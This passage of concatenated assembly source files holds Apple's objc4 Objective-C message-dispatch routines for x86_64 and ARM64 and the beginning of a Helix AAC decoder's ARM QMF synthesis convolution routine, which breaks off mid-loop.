cmpq (%r10), %a2 // if (bucket->sel != _cmd)
.else
cmpq (%r10), %a3 // if (bucket->sel != _cmd)
.endif
jne 1f // scan more
// CacheHit must always be preceded by a not-taken `jne` instruction
CacheHit $0 // call or return imp
1:
// loop
cmpq $$1, (%r10)
jbe 3f // if (bucket->sel <= 1) wrap or miss
addq $$16, %r10 // bucket++
2:
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
cmpq (%r10), %a2 // if (bucket->sel != _cmd)
.else
cmpq (%r10), %a3 // if (bucket->sel != _cmd)
.endif
jne 1b // scan more
// CacheHit must always be preceded by a not-taken `jne` instruction
CacheHit $0 // call or return imp
3:
// wrap or miss
jb LCacheMiss_f // if (bucket->sel < 1) cache miss
// wrap
movq 8(%r10), %r10 // bucket->imp is really first bucket
jmp 2f
// Clone scanning loop to miss instead of hang when cache is corrupt.
// The slow path may detect any corruption and halt later.
1:
// loop
cmpq $$1, (%r10)
jbe 3f // if (bucket->sel <= 1) wrap or miss
addq $$16, %r10 // bucket++
2:
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
cmpq (%r10), %a2 // if (bucket->sel != _cmd)
.else
cmpq (%r10), %a3 // if (bucket->sel != _cmd)
.endif
jne 1b // scan more
// CacheHit must always be preceded by a not-taken `jne` instruction
CacheHit $0 // call or return imp
3:
// double wrap or miss
jmp LCacheMiss_f
.endmacro
/////////////////////////////////////////////////////////////////////
//
// MethodTableLookup classRegister, selectorRegister
//
// Takes: $0 = class to search (a1 or a2 or r10 ONLY)
// $1 = selector to search for (a2 or a3 ONLY)
// r11 = class to search
//
// On exit: imp in %r11
//
/////////////////////////////////////////////////////////////////////
.macro MethodTableLookup
MESSENGER_END_SLOW
SaveRegisters
// _class_lookupMethodAndLoadCache3(receiver, selector, class)
movq $0, %a1
movq $1, %a2
movq %r11, %a3
call __class_lookupMethodAndLoadCache3
// IMP is now in %rax
movq %rax, %r11
RestoreRegisters
.endmacro
/////////////////////////////////////////////////////////////////////
//
// GetIsaFast return-type
// GetIsaSupport return-type
//
// Sets r11 = obj->isa. Consults the tagged isa table if necessary.
//
// Takes: $0 = NORMAL or FPRET or FP2RET or STRET
// a1 or a2 (STRET) = receiver
//
// On exit: r11 = receiver->isa
// r10 is clobbered
//
/////////////////////////////////////////////////////////////////////
.macro GetIsaFast
.if $0 != STRET
testb $$1, %a1b
PN
jnz LGetIsaSlow_f
movq $$0x00007ffffffffff8, %r11
andq (%a1), %r11
.else
testb $$1, %a2b
PN
jnz LGetIsaSlow_f
movq $$0x00007ffffffffff8, %r11
andq (%a2), %r11
.endif
LGetIsaDone:
.endmacro
.macro GetIsaSupport2
LGetIsaSlow:
leaq _objc_debug_taggedpointer_classes(%rip), %r11
.if $0 != STRET
movl %a1d, %r10d
.else
movl %a2d, %r10d
.endif
andl $$0xF, %r10d
movq (%r11, %r10, 8), %r11 // read isa from table
.endmacro
.macro GetIsaSupport
GetIsaSupport2 $0
jmp LGetIsaDone_b
.endmacro
.macro GetIsa
GetIsaFast $0
jmp LGetIsaDone_f
GetIsaSupport2 $0
LGetIsaDone:
.endmacro
/////////////////////////////////////////////////////////////////////
//
// NilTest return-type
//
// Takes: $0 = NORMAL or FPRET or FP2RET or STRET
// %a1 or %a2 (STRET) = receiver
//
// On exit: Loads non-nil receiver in %a1 or %a2 (STRET), or returns zero.
//
// NilTestSupport return-type
//
// Takes: $0 = NORMAL or FPRET or FP2RET or STRET
// %a1 or %a2 (STRET) = receiver
//
// On exit: Loads non-nil receiver in %a1 or %a2 (STRET), or returns zero.
//
/////////////////////////////////////////////////////////////////////
.macro NilTest
.if $0 == SUPER || $0 == SUPER_STRET
error super dispatch does not test for nil
.endif
.if $0 != STRET
testq %a1, %a1
.else
testq %a2, %a2
.endif
PN
jz LNilTestSlow_f
.endmacro
.macro NilTestSupport
.align 3
LNilTestSlow:
.if $0 == FPRET
fldz
.elseif $0 == FP2RET
fldz
fldz
.endif
.if $0 == STRET
movq %rdi, %rax
.else
xorl %eax, %eax
xorl %edx, %edx
xorps %xmm0, %xmm0
xorps %xmm1, %xmm1
.endif
MESSENGER_END_NIL
ret
.endmacro
/********************************************************************
* IMP cache_getImp(Class cls, SEL sel)
*
* On entry: a1 = class whose cache is to be searched
* a2 = selector to search for
*
* If found, returns method implementation.
* If not found, returns NULL.
********************************************************************/
STATIC_ENTRY _cache_getImp
// do lookup
movq %a1, %r11 // move class to r11 for CacheLookup
CacheLookup GETIMP // returns IMP on success
LCacheMiss:
// cache miss, return nil
xorl %eax, %eax
ret
LGetImpExit:
END_ENTRY _cache_getImp
/********************************************************************
*
* id objc_msgSend(id self, SEL _cmd,...);
*
********************************************************************/
.data
.align 3
.globl _objc_debug_taggedpointer_classes
_objc_debug_taggedpointer_classes:
.fill 16, 8, 0
ENTRY _objc_msgSend
MESSENGER_START
NilTest NORMAL
GetIsaFast NORMAL // r11 = self->isa
CacheLookup NORMAL // calls IMP on success
NilTestSupport NORMAL
GetIsaSupport NORMAL
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend
ENTRY _objc_msgSend_fixup
int3
END_ENTRY _objc_msgSend_fixup
STATIC_ENTRY _objc_msgSend_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSend
END_ENTRY _objc_msgSend_fixedup
/********************************************************************
*
* id objc_msgSendSuper(struct objc_super *super, SEL _cmd,...);
*
* struct objc_super {
* id receiver;
* Class class;
* };
********************************************************************/
ENTRY _objc_msgSendSuper
MESSENGER_START
// search the cache (objc_super in %a1)
movq class(%a1), %r11 // class = objc_super->class
CacheLookup SUPER // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// class still in r11
movq receiver(%a1), %r10
MethodTableLookup %r10, %a2 // r11 = IMP
movq receiver(%a1), %a1 // load real receiver
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper
/********************************************************************
* id objc_msgSendSuper2
********************************************************************/
ENTRY _objc_msgSendSuper2
MESSENGER_START
// objc_super->class is superclass of class to search
// search the cache (objc_super in %a1)
movq class(%a1), %r11 // cls = objc_super->class
movq 8(%r11), %r11 // cls = class->superclass
CacheLookup SUPER2 // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// superclass still in r11
movq receiver(%a1), %r10
MethodTableLookup %r10, %a2 // r11 = IMP
movq receiver(%a1), %a1 // load real receiver
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper2
ENTRY _objc_msgSendSuper2_fixup
int3
END_ENTRY _objc_msgSendSuper2_fixup
STATIC_ENTRY _objc_msgSendSuper2_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSendSuper2
END_ENTRY _objc_msgSendSuper2_fixedup
/********************************************************************
*
* double objc_msgSend_fpret(id self, SEL _cmd,...);
* Used for `long double` return only. `float` and `double` use objc_msgSend.
*
********************************************************************/
ENTRY _objc_msgSend_fpret
MESSENGER_START
NilTest FPRET
GetIsaFast FPRET // r11 = self->isa
CacheLookup FPRET // calls IMP on success
NilTestSupport FPRET
GetIsaSupport FPRET
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend_fpret
ENTRY _objc_msgSend_fpret_fixup
int3
END_ENTRY _objc_msgSend_fpret_fixup
STATIC_ENTRY _objc_msgSend_fpret_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSend_fpret
END_ENTRY _objc_msgSend_fpret_fixedup
/********************************************************************
*
* double objc_msgSend_fp2ret(id self, SEL _cmd,...);
* Used for `complex long double` return only.
*
********************************************************************/
ENTRY _objc_msgSend_fp2ret
MESSENGER_START
NilTest FP2RET
GetIsaFast FP2RET // r11 = self->isa
CacheLookup FP2RET // calls IMP on success
NilTestSupport FP2RET
GetIsaSupport FP2RET
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend_fp2ret
ENTRY _objc_msgSend_fp2ret_fixup
int3
END_ENTRY _objc_msgSend_fp2ret_fixup
STATIC_ENTRY _objc_msgSend_fp2ret_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSend_fp2ret
END_ENTRY _objc_msgSend_fp2ret_fixedup
/********************************************************************
*
* void objc_msgSend_stret(void *st_addr, id self, SEL _cmd, ...);
*
* objc_msgSend_stret is the struct-return form of msgSend.
* The ABI calls for %a1 to be used as the address of the structure
* being returned, with the parameters in the succeeding locations.
*
* On entry: %a1 is the address where the structure is returned,
* %a2 is the message receiver,
* %a3 is the selector
********************************************************************/
ENTRY _objc_msgSend_stret
MESSENGER_START
NilTest STRET
GetIsaFast STRET // r11 = self->isa
CacheLookup STRET // calls IMP on success
NilTestSupport STRET
GetIsaSupport STRET
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a2, %a3 // r11 = IMP
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend_stret
ENTRY _objc_msgSend_stret_fixup
int3
END_ENTRY _objc_msgSend_stret_fixup
STATIC_ENTRY _objc_msgSend_stret_fixedup
// Load _cmd from the message_ref
movq 8(%a3), %a3
jmp _objc_msgSend_stret
END_ENTRY _objc_msgSend_stret_fixedup
/********************************************************************
*
* void objc_msgSendSuper_stret(void *st_addr, struct objc_super *super, SEL _cmd, ...);
*
* struct objc_super {
* id receiver;
* Class class;
* };
*
* objc_msgSendSuper_stret is the struct-return form of msgSendSuper.
* The ABI calls for (sp+4) to be used as the address of the structure
* being returned, with the parameters in the succeeding registers.
*
* On entry: %a1 is the address where the structure is returned,
* %a2 is the address of the objc_super structure,
* %a3 is the selector
*
********************************************************************/
ENTRY _objc_msgSendSuper_stret
MESSENGER_START
// search the cache (objc_super in %a2)
movq class(%a2), %r11 // class = objc_super->class
CacheLookup SUPER_STRET // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// class still in r11
movq receiver(%a2), %r10
MethodTableLookup %r10, %a3 // r11 = IMP
movq receiver(%a2), %a2 // load real receiver
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper_stret
/********************************************************************
* id objc_msgSendSuper2_stret
********************************************************************/
ENTRY _objc_msgSendSuper2_stret
MESSENGER_START
// search the cache (objc_super in %a2)
movq class(%a2), %r11 // class = objc_super->class
movq 8(%r11), %r11 // class = class->superclass
CacheLookup SUPER2_STRET // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// superclass still in r11
movq receiver(%a2), %r10
MethodTableLookup %r10, %a3 // r11 = IMP
movq receiver(%a2), %a2 // load real receiver
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper2_stret
ENTRY _objc_msgSendSuper2_stret_fixup
int3
END_ENTRY _objc_msgSendSuper2_stret_fixup
STATIC_ENTRY _objc_msgSendSuper2_stret_fixedup
// Load _cmd from the message_ref
movq 8(%a3), %a3
jmp _objc_msgSendSuper2_stret
END_ENTRY _objc_msgSendSuper2_stret_fixedup
/********************************************************************
*
* _objc_msgSend_uncached_impcache
* _objc_msgSend_uncached
* _objc_msgSend_stret_uncached
*
* Used to erase method cache entries in-place by
* bouncing them to the uncached lookup.
*
********************************************************************/
STATIC_ENTRY __objc_msgSend_uncached_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band condition register is NE for stret, EQ otherwise.
// Out-of-band r11 is the searched class
MESSENGER_START
nop
MESSENGER_END_SLOW
jne __objc_msgSend_stret_uncached
jmp __objc_msgSend_uncached
END_ENTRY __objc_msgSend_uncached_impcache
STATIC_ENTRY __objc_msgSend_uncached
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band r11 is the searched class
// r11 is already the class to search
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY __objc_msgSend_uncached
STATIC_ENTRY __objc_msgSend_stret_uncached
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band r11 is the searched class
// r11 is already the class to search
MethodTableLookup %a2, %a3 // r11 = IMP
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY __objc_msgSend_stret_uncached
/********************************************************************
*
* id _objc_msgForward(id self, SEL _cmd,...);
*
* _objc_msgForward and _objc_msgForward_stret are the externally-callable
* functions returned by things like method_getImplementation().
* _objc_msgForward_impcache is the function pointer actually stored in
* method caches.
*
********************************************************************/
STATIC_ENTRY __objc_msgForward_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band condition register is NE for stret, EQ otherwise.
MESSENGER_START
nop
MESSENGER_END_SLOW
jne __objc_msgForward_stret
jmp __objc_msgForward
END_ENTRY __objc_msgForward_impcache
ENTRY __objc_msgForward
// Non-stret version
movq __objc_forward_handler(%rip), %r11
jmp *%r11
END_ENTRY __objc_msgForward
ENTRY __objc_msgForward_stret
// Struct-return version
movq __objc_forward_stret_handler(%rip), %r11
jmp *%r11
END_ENTRY __objc_msgForward_stret
ENTRY _objc_msgSend_debug
jmp _objc_msgSend
END_ENTRY _objc_msgSend_debug
ENTRY _objc_msgSendSuper2_debug
jmp _objc_msgSendSuper2
END_ENTRY _objc_msgSendSuper2_debug
ENTRY _objc_msgSend_stret_debug
jmp _objc_msgSend_stret
END_ENTRY _objc_msgSend_stret_debug
ENTRY _objc_msgSendSuper2_stret_debug
jmp _objc_msgSendSuper2_stret
END_ENTRY _objc_msgSendSuper2_stret_debug
ENTRY _objc_msgSend_fpret_debug
jmp _objc_msgSend_fpret
END_ENTRY _objc_msgSend_fpret_debug
ENTRY _objc_msgSend_fp2ret_debug
jmp _objc_msgSend_fp2ret
END_ENTRY _objc_msgSend_fp2ret_debug
ENTRY _objc_msgSend_noarg
jmp _objc_msgSend
END_ENTRY _objc_msgSend_noarg
ENTRY _method_invoke
movq method_imp(%a2), %r11
movq method_name(%a2), %a2
jmp *%r11
END_ENTRY _method_invoke
ENTRY _method_invoke_stret
movq method_imp(%a3), %r11
movq method_name(%a3), %a3
jmp *%r11
END_ENTRY _method_invoke_stret
STATIC_ENTRY __objc_ignored_method
movq %a1, %rax
ret
END_ENTRY __objc_ignored_method
.section __DATA,__objc_msg_break
.quad 0
.quad 0
// Workaround for Skype evil (rdar://19715989)
.text
.align 4
.private_extern _map_images
.private_extern _map_2_images
.private_extern _hax
_hax:
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
_map_images:
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
jmp _map_2_images
#endif
|
opensource-apple/objc4 | 11,080 | runtime/Messengers.subproj/objc-msg-arm64.s | /*
* @APPLE_LICENSE_HEADER_START@
*
* Copyright (c) 2011 Apple Inc. All Rights Reserved.
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this
* file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_LICENSE_HEADER_END@
*/
/********************************************************************
*
* objc-msg-arm64.s - ARM64 code to support objc messaging
*
********************************************************************/
#ifdef __arm64__
#include <arm/arch.h>
.data
// _objc_entryPoints and _objc_exitPoints are used by method dispatch
// caching code to figure out whether any threads are actively
// in the cache for dispatching. The labels surround the asm code
// that do cache lookups. The tables are zero-terminated.
.align 4
.private_extern _objc_entryPoints
_objc_entryPoints:
.quad _cache_getImp
.quad _objc_msgSend
.quad _objc_msgSendSuper
.quad _objc_msgSendSuper2
.quad 0
.private_extern _objc_exitPoints
_objc_exitPoints:
.quad LExit_cache_getImp
.quad LExit_objc_msgSend
.quad LExit_objc_msgSendSuper
.quad LExit_objc_msgSendSuper2
.quad 0
/********************************************************************
* List every exit insn from every messenger for debugger use.
* Format:
* (
* 1 word instruction's address
* 1 word type (ENTER or FAST_EXIT or SLOW_EXIT or NIL_EXIT)
* )
* 1 word zero
*
* ENTER is the start of a dispatcher
* FAST_EXIT is method dispatch
* SLOW_EXIT is uncached method lookup
* NIL_EXIT is returning zero from a message sent to nil
* These must match objc-gdb.h.
********************************************************************/
#define ENTER 1
#define FAST_EXIT 2
#define SLOW_EXIT 3
#define NIL_EXIT 4
.section __DATA,__objc_msg_break
.globl _gdb_objc_messenger_breakpoints
_gdb_objc_messenger_breakpoints:
// contents populated by the macros below
.macro MESSENGER_START
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad ENTER
.text
.endmacro
.macro MESSENGER_END_FAST
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad FAST_EXIT
.text
.endmacro
.macro MESSENGER_END_SLOW
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad SLOW_EXIT
.text
.endmacro
.macro MESSENGER_END_NIL
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad NIL_EXIT
.text
.endmacro
/* objc_super parameter to sendSuper */
#define RECEIVER 0
#define CLASS 8
/* Selected field offsets in class structure */
#define SUPERCLASS 8
#define CACHE 16
/* Selected field offsets in isa field */
#define ISA_MASK 0x00000001fffffff8
/* Selected field offsets in method structure */
#define METHOD_NAME 0
#define METHOD_TYPES 8
#define METHOD_IMP 16
/********************************************************************
* ENTRY functionName
* STATIC_ENTRY functionName
* END_ENTRY functionName
********************************************************************/
.macro ENTRY /* name */
.text
.align 5
.globl $0
$0:
.endmacro
.macro STATIC_ENTRY /*name*/
.text
.align 5
.private_extern $0
$0:
.endmacro
.macro END_ENTRY /* name */
LExit$0:
.endmacro
/********************************************************************
*
* CacheLookup NORMAL|GETIMP
*
* Locate the implementation for a selector in a class method cache.
*
* Takes:
* x1 = selector
* x9 = class to be searched
*
* Kills:
* x10,x11,x12, x16,x17
*
* On exit: (found) exits CacheLookup
* with x9 = class, x17 = IMP
* (not found) jumps to LCacheMiss
*
********************************************************************/
#define NORMAL 0
#define GETIMP 1
.macro CacheHit
MESSENGER_END_FAST
.if $0 == NORMAL
br x17 // call imp
.else
b LGetImpHit
.endif
.endmacro
.macro CheckMiss
.if $0 == NORMAL // miss if bucket->cls == 0
cbz x16, __objc_msgSend_uncached_impcache
.else
cbz x16, LGetImpMiss
.endif
.endmacro
.macro JumpMiss
.if $0 == NORMAL
b __objc_msgSend_uncached_impcache
.else
b LGetImpMiss
.endif
.endmacro
.macro CacheLookup
// x1 = SEL, x9 = isa
ldp x10, x11, [x9, #CACHE] // x10 = buckets, x11 = occupied|mask
and w12, w1, w11 // x12 = _cmd & mask
add x12, x10, x12, LSL #4 // x12 = buckets + ((_cmd & mask)<<4)
ldp x16, x17, [x12] // {x16, x17} = *bucket
1: cmp x16, x1 // if (bucket->sel != _cmd)
b.ne 2f // scan more
CacheHit $0 // call or return imp
2: // not hit: x12 = not-hit bucket
CheckMiss $0 // miss if bucket->cls == 0
cmp x12, x10 // wrap if bucket == buckets
b.eq 3f
ldp x16, x17, [x12, #-16]! // {x16, x17} = *--bucket
b 1b // loop
3: // wrap: x12 = first bucket, w11 = mask
add x12, x12, w11, UXTW #4 // x12 = buckets+(mask<<4)
// Clone scanning loop to miss instead of hang when cache is corrupt.
// The slow path may detect any corruption and halt later.
ldp x16, x17, [x12] // {x16, x17} = *bucket
1: cmp x16, x1 // if (bucket->sel != _cmd)
b.ne 2f // scan more
CacheHit $0 // call or return imp
2: // not hit: x12 = not-hit bucket
CheckMiss $0 // miss if bucket->cls == 0
cmp x12, x10 // wrap if bucket == buckets
b.eq 3f
ldp x16, x17, [x12, #-16]! // {x16, x17} = *--bucket
b 1b // loop
3: // double wrap
JumpMiss $0
.endmacro
.data
.align 3
.globl _objc_debug_taggedpointer_classes
_objc_debug_taggedpointer_classes:
.fill 16, 8, 0
ENTRY _objc_msgSend
MESSENGER_START
cmp x0, #0 // nil check and tagged pointer check
b.le LNilOrTagged // (MSB tagged pointer looks negative)
ldr x13, [x0] // x13 = isa
and x9, x13, #ISA_MASK // x9 = class
LGetIsaDone:
CacheLookup NORMAL // calls imp or objc_msgSend_uncached
LNilOrTagged:
b.eq LReturnZero // nil check
// tagged
adrp x10, _objc_debug_taggedpointer_classes@PAGE
add x10, x10, _objc_debug_taggedpointer_classes@PAGEOFF
ubfx x11, x0, #60, #4
ldr x9, [x10, x11, LSL #3]
b LGetIsaDone
LReturnZero:
// x0 is already zero
mov x1, #0
movi d0, #0
movi d1, #0
movi d2, #0
movi d3, #0
MESSENGER_END_NIL
ret
END_ENTRY _objc_msgSend
ENTRY _objc_msgSendSuper
MESSENGER_START
ldr x9, [x0, #CLASS] // load class to search
ldr x0, [x0, #RECEIVER] // load real receiver
CacheLookup NORMAL // calls imp or objc_msgSend_uncached
END_ENTRY _objc_msgSendSuper
ENTRY _objc_msgSendSuper2
MESSENGER_START
ldr x9, [x0, #CLASS]
ldr x9, [x9, #SUPERCLASS] // load class to search
ldr x0, [x0, #RECEIVER] // load real receiver
CacheLookup NORMAL
END_ENTRY _objc_msgSendSuper2
ENTRY _objc_msgSend_noarg
b _objc_msgSend
END_ENTRY _objc_msgSend_noarg
STATIC_ENTRY __objc_msgSend_uncached_impcache
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band x9 is the class to search
MESSENGER_START
// push frame
stp fp, lr, [sp, #-16]!
mov fp, sp
MESSENGER_END_SLOW
// save parameter registers: x0..x8, q0..q7
sub sp, sp, #(10*8 + 8*16)
stp q0, q1, [sp, #(0*16)]
stp q2, q3, [sp, #(2*16)]
stp q4, q5, [sp, #(4*16)]
stp q6, q7, [sp, #(6*16)]
stp x0, x1, [sp, #(8*16+0*8)]
stp x2, x3, [sp, #(8*16+2*8)]
stp x4, x5, [sp, #(8*16+4*8)]
stp x6, x7, [sp, #(8*16+6*8)]
str x8, [sp, #(8*16+8*8)]
// receiver and selector already in x0 and x1
mov x2, x9
bl __class_lookupMethodAndLoadCache3
// imp in x0
mov x17, x0
// restore registers and return
ldp q0, q1, [sp, #(0*16)]
ldp q2, q3, [sp, #(2*16)]
ldp q4, q5, [sp, #(4*16)]
ldp q6, q7, [sp, #(6*16)]
ldp x0, x1, [sp, #(8*16+0*8)]
ldp x2, x3, [sp, #(8*16+2*8)]
ldp x4, x5, [sp, #(8*16+4*8)]
ldp x6, x7, [sp, #(8*16+6*8)]
ldr x8, [sp, #(8*16+8*8)]
mov sp, fp
ldp fp, lr, [sp], #16
br x17
END_ENTRY __objc_msgSend_uncached_impcache
.section __LD,__compact_unwind,regular,debug
.quad _objc_msgSend
.set LUnwind_objc_msgSend, LExit_objc_msgSend-_objc_msgSend
.long LUnwind_objc_msgSend
.long 0x02000000 // no frame, no SP adjustment
.quad 0 // no personality
.quad 0 // no LSDA
.section __LD,__compact_unwind,regular,debug
.quad _objc_msgSendSuper
.set LUnwind_objc_msgSendSuper, LExit_objc_msgSendSuper-_objc_msgSendSuper
.long LUnwind_objc_msgSendSuper
.long 0x02000000 // no frame, no SP adjustment
.quad 0 // no personality
.quad 0 // no LSDA
.section __LD,__compact_unwind,regular,debug
.quad _objc_msgSendSuper2
.set LUnwind_objc_msgSendSuper2, LExit_objc_msgSendSuper2-_objc_msgSendSuper2
.long LUnwind_objc_msgSendSuper2
.long 0x02000000 // no frame, no SP adjustment
.quad 0 // no personality
.quad 0 // no LSDA
.section __LD,__compact_unwind,regular,debug
.quad __objc_msgSend_uncached_impcache
.set LUnwind__objc_msgSend_uncached_impcache, LExit__objc_msgSend_uncached_impcache-__objc_msgSend_uncached_impcache
.long LUnwind__objc_msgSend_uncached_impcache
.long 0x04000000 // frame, no non-volatile registers saved
.quad 0 // no personality
.quad 0 // no LSDA
STATIC_ENTRY _cache_getImp
and x9, x0, #ISA_MASK
CacheLookup GETIMP
LGetImpHit:
// imp in x17
// don't return msgSend_uncached
adrp x16, __objc_msgSend_uncached_impcache@PAGE
add x16, x16, __objc_msgSend_uncached_impcache@PAGEOFF
cmp x16, x17
csel x0, x17, xzr, ne // if imp!=uncached then imp else 0
ret
LGetImpMiss:
mov x0, #0
ret
END_ENTRY _cache_getImp
/********************************************************************
*
* id _objc_msgForward(id self, SEL _cmd,...);
*
* _objc_msgForward is the externally-callable
* function returned by things like method_getImplementation().
* _objc_msgForward_impcache is the function pointer actually stored in
* method caches.
*
********************************************************************/
STATIC_ENTRY __objc_msgForward_impcache
MESSENGER_START
nop
MESSENGER_END_SLOW
// No stret specialization.
b __objc_msgForward
END_ENTRY __objc_msgForward_impcache
ENTRY __objc_msgForward
adrp x17, __objc_forward_handler@PAGE
ldr x17, [x17, __objc_forward_handler@PAGEOFF]
br x17
END_ENTRY __objc_msgForward
ENTRY _objc_msgSend_debug
b _objc_msgSend
END_ENTRY _objc_msgSend_debug
ENTRY _objc_msgSendSuper2_debug
b _objc_msgSendSuper2
END_ENTRY _objc_msgSendSuper2_debug
ENTRY _method_invoke
// x1 is method triplet instead of SEL
ldr x17, [x1, #METHOD_IMP]
ldr x1, [x1, #METHOD_NAME]
br x17
END_ENTRY _method_invoke
STATIC_ENTRY __objc_ignored_method
// self is already in x0
ret
END_ENTRY __objc_ignored_method
#endif
|
open-vela/external_libhelix-aac | 4,340 | sbrqmfsk.s | @ ***** BEGIN LICENSE BLOCK *****
@ Source last modified: $Id: sbrqmfsk.s,v 1.1 2005/04/08 21:59:46 jrecker Exp $
@
@ Portions Copyright (c) 1995-2005 RealNetworks, Inc. All Rights Reserved.
@
@ The contents of this file, and the files included with this file,
@ are subject to the current version of the RealNetworks Public
@ Source License (the "RPSL") available at
@ http://www.helixcommunity.org/content/rpsl unless you have licensed
@ the file under the current version of the RealNetworks Community
@ Source License (the "RCSL") available at
@ http://www.helixcommunity.org/content/rcsl, in which case the RCSL
@ will apply. You may also obtain the license terms directly from
@ RealNetworks. You may not use this file except in compliance with
@ the RPSL or, if you have a valid RCSL with RealNetworks applicable
@ to this file, the RCSL. Please see the applicable RPSL or RCSL for
@ the rights, obligations and limitations governing use of the
@ contents of the file.
@
@ This file is part of the Helix DNA Technology. RealNetworks is the
@ developer and/or licensor of the Original Code and owns the
@ copyrights in the portions it created.
@
@ This file, and the files included with this file, is distributed
@ and made available on an 'AS IS' basis, WITHOUT WARRANTY OF ANY
@ KIND, EITHER EXPRESS OR IMPLIED, AND REALNETWORKS HEREBY DISCLAIMS
@ ALL SUCH WARRANTIES, INCLUDING WITHOUT LIMITATION, ANY WARRANTIES
@ OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, QUIET
@ ENJOYMENT OR NON-INFRINGEMENT.
@
@ Technology Compatibility Kit Test Suite(s) Location:
@ http://www.helixcommunity.org/content/tck
@
@ Contributor(s):
@
@ ***** END LICENSE BLOCK *****
.syntax unified
.thumb
.thumb_func
.align 2
@ void QMFSynthesisConv(int *cPtr, int *delay, int dIdx, short *outbuf, int nChans);
@ see comments in sbrqmf.c
.global raac_QMFSynthesisConv
raac_QMFSynthesisConv:
stmfd sp!, {r4-r11, r14}
ldr r9, [r13, #4*9] @ we saved 9 registers on stack
mov r5, r2, lsl #7 @ dOff0 = 128*dIdx
subs r6, r5, #1 @ dOff1 = dOff0 - 1
addlt r6, r6, #1280 @ if (dOff1 < 0) then dOff1 += 1280
mov r4, #64
SRC_Loop_Start:
ldr r10, [r0], #4
ldr r12, [r0], #4
ldr r11, [r1, r5, lsl #2]
ldr r14, [r1, r6, lsl #2]
smull r7, r8, r10, r11
subs r5, r5, #256
addlt r5, r5, #1280
smlal r7, r8, r12, r14
subs r6, r6, #256
addlt r6, r6, #1280
ldr r10, [r0], #4
ldr r12, [r0], #4
ldr r11, [r1, r5, lsl #2]
ldr r14, [r1, r6, lsl #2]
smlal r7, r8, r10, r11
subs r5, r5, #256
addlt r5, r5, #1280
smlal r7, r8, r12, r14
subs r6, r6, #256
addlt r6, r6, #1280
ldr r10, [r0], #4
ldr r12, [r0], #4
ldr r11, [r1, r5, lsl #2]
ldr r14, [r1, r6, lsl #2]
smlal r7, r8, r10, r11
subs r5, r5, #256
addlt r5, r5, #1280
smlal r7, r8, r12, r14
subs r6, r6, #256
addlt r6, r6, #1280
ldr r10, [r0], #4
ldr r12, [r0], #4
ldr r11, [r1, r5, lsl #2]
ldr r14, [r1, r6, lsl #2]
smlal r7, r8, r10, r11
subs r5, r5, #256
addlt r5, r5, #1280
smlal r7, r8, r12, r14
subs r6, r6, #256
addlt r6, r6, #1280
ldr r10, [r0], #4
ldr r12, [r0], #4
ldr r11, [r1, r5, lsl #2]
ldr r14, [r1, r6, lsl #2]
smlal r7, r8, r10, r11
subs r5, r5, #256
addlt r5, r5, #1280
smlal r7, r8, r12, r14
subs r6, r6, #256
